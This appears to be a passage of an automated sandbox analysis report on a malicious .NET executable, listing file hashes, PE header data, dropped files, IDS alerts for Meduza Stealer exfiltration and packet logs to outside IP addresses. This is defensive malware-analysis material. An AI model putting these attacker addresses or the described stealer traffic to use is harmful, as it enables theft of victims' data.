                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2232
                                                                                                                                                                Entropy (8bit):5.379677338874509
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:tWSU4YymI4RIoUeW+gZ9tK8NPZHUxL7u1iMuge//ZmUyus:tLHYvIIfLgZ2KRHWLOuggs
                                                                                                                                                                MD5:8A9F57A7C8713307D8C9E4105ABF29E3
                                                                                                                                                                SHA1:B913B9D05147A48F27FA319FD6CDE7E8D35DE119
                                                                                                                                                                SHA-256:5AB4CA40805EFE83B7A295B44F5238CDBDF453D75C9D619797AF8C283029EE14
                                                                                                                                                                SHA-512:0AAD494EEDAE767A3C7B1E93B61B4971EACAEF8AF40776E148037DDAFCD3A91DDD91DA8B2A4756F3F761AD6491C35227CA3FA8586D0B8D02C062CAF996D2E75F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                                                Process:C:\Users\user\Desktop\9RM52QaURq.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2632704
                                                                                                                                                                Entropy (8bit):3.734500250570844
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:MoEKQByjnqh0lhSMXlybSXuRVRoTahOpEfc:jLzjneSan
                                                                                                                                                                MD5:183E24B654414D7BE786CCD8E6A108A5
                                                                                                                                                                SHA1:A18E6D0F9D1E67F404985ADFA2CC6D756E8680AC
                                                                                                                                                                SHA-256:69F8CEA7A5B6E5DE711E9849F4BC0244F1344966364520BC12987F1B90013754
                                                                                                                                                                SHA-512:8CB2D66A7FFE9E84B9BACE8BBD859F050FBF7DC0CB9C4A262BF3467A39D3DB43272D40A071FD2867E84A4CD262BAA6E5347A46556DCAE1A1BFFA0497A147850B
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                • Filename: HZ1BUCfTne.exe, Detection: malicious, Browse
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........T...5...5...5.......5.......5.......5...M..H5...M...5...M...5......5.......5...M...5...5..h5.......5.......5.......5..Rich.5..................PE..d....O4g.........."....).j....$................@..............................(...........`.................................................T.'.d....`(......0(.p,...........p(.P.....'.8.............................'.@............................................text....h.......j.................. ..`.rdata...p$......r$..n..............@..@.data....(....(.......'.............@....pdata..p,...0(.......'.............@..@.rsrc........`(...... (.............@..@.reloc..P....p(......"(.............@..B................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                Entropy (8bit):4.982896837473748
                                                                                                                                                                TrID:
                                                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                File name:9RM52QaURq.exe
                                                                                                                                                                File size:37'376 bytes
                                                                                                                                                                MD5:9913a016528f9d9c4aac737c6a06c596
                                                                                                                                                                SHA1:197435ebdeab5f6df6e10d1c5aec40812cb9dfdf
                                                                                                                                                                SHA256:ca53439dbc9699e109a1810227c124dadca4066758511727be95e57b8ce3bc0f
                                                                                                                                                                SHA512:d7013c2edf7245989e1a38e9f4a85aa22e4168c609920d73ecbd9f9006a9060ab78e2ef77a7d22371404b0241a36103b4824287ddb263a495303df12f99c6791
                                                                                                                                                                SSDEEP:768:vdfxnLzsA5NVk9FrHE7be6C5jLjkmBcgYcV6kizh:vdfxnLd5yB5jFco6kiz
                                                                                                                                                                TLSH:FCF2F74063F85225FAFB3F74A8B516240F76BC6AAD39E65C3588108E1AB2F54C970773
                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t............."...0..x..........b.... ........@.. ....................................`................................
                                                                                                                                                                Icon Hash:90cececece8e8eb0
                                                                                                                                                                Entrypoint:0x409662
                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                Digitally signed:false
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                Time Stamp:0xB9F2BE74 [Fri Nov 9 13:30:28 2068 UTC]
                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                OS Version Major:4
                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                File Version Major:4
                                                                                                                                                                File Version Minor:0
                                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                Instruction
                                                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x96100x4f.text
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x1514.rsrc
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xc0000xc.reloc
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x95740x38.text
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                .text0x20000x76680x78006242d7b63f2b88ad2a0015f8e3e95be8False0.37470703125data4.788650567844553IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                .rsrc0xa0000x15140x16008549064275cae1a1a2e77bb59446ca21False0.3854758522727273data5.3792251226562655IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                .reloc0xc0000xc0x20009bd080e14f154bbaf62e06d6b1d885cFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                RT_VERSION0xa0900x34cdata0.4087677725118483
                                                                                                                                                                RT_MANIFEST0xa3ec0x1123XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.4043765671301573
                                                                                                                                                                DLLImport
                                                                                                                                                                mscoree.dll_CorExeMain
                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                2024-11-15T10:28:51.927747+01002049441ET MALWARE Win32/Unknown Grabber Base64 Data Exfiltration Attempt1192.168.2.45397645.130.145.15215666TCP
                                                                                                                                                                2024-11-15T10:28:51.927747+01002050806ET MALWARE [ANY.RUN] Meduza Stealer Exfiltration M21192.168.2.45397645.130.145.15215666TCP
                                                                                                                                                                2024-11-15T10:28:51.927747+01002050807ET MALWARE [ANY.RUN] Possible Meduza Stealer Exfiltration (TCP)1192.168.2.45397645.130.145.15215666TCP
                                                                                                                                                                2024-11-15T10:28:51.932774+01002050806ET MALWARE [ANY.RUN] Meduza Stealer Exfiltration M21192.168.2.45397645.130.145.15215666TCP
                                                                                                                                                                2024-11-15T10:28:51.932774+01002050807ET MALWARE [ANY.RUN] Possible Meduza Stealer Exfiltration (TCP)1192.168.2.45397645.130.145.15215666TCP
                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Nov 15, 2024 10:28:13.226176977 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:13.231159925 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:13.231293917 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:13.232213974 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:13.237308979 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.136056900 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.136115074 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.136152029 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.136182070 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.136184931 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.136220932 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.136236906 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.136254072 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.136288881 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.136300087 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.136322975 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.136357069 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.136365891 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.136395931 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.136440039 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.141387939 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.192424059 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.264849901 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.264870882 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.264884949 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.264936924 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.269421101 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.269465923 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.269474030 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.269505024 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.269550085 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.279233932 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.279396057 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.279427052 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.279448032 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.287458897 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.287499905 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.287543058 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.292037010 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.292074919 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.292084932 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.292112112 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.292162895 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.301467896 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.301503897 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.301538944 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.301551104 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.310252905 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.310297966 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.310327053 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.364310026 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.388540983 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.388556957 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.388739109 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.392416000 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.392498970 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.392548084 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.392565012 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.392574072 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.392613888 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.394305944 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.394315004 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.394362926 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.401498079 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.401530027 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.401583910 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.408263922 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.408293962 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.408344984 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.415199995 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.415230989 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.415282011 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.415282965 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.415329933 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.415379047 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.415992022 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.416021109 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.416064024 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.424664974 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.424734116 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.424767971 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.424784899 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.473675966 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.478384018 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.478423119 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.478480101 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.511053085 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.511089087 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.511126041 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.511135101 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.515650034 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.515697956 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.515702963 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.517560959 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.517596006 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.517605066 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.517631054 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.517680883 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.527642012 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.527684927 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.527734041 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.531439066 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.531491041 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:15.531552076 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:15.538610935 CET8049736150.241.95.163192.168.2.4
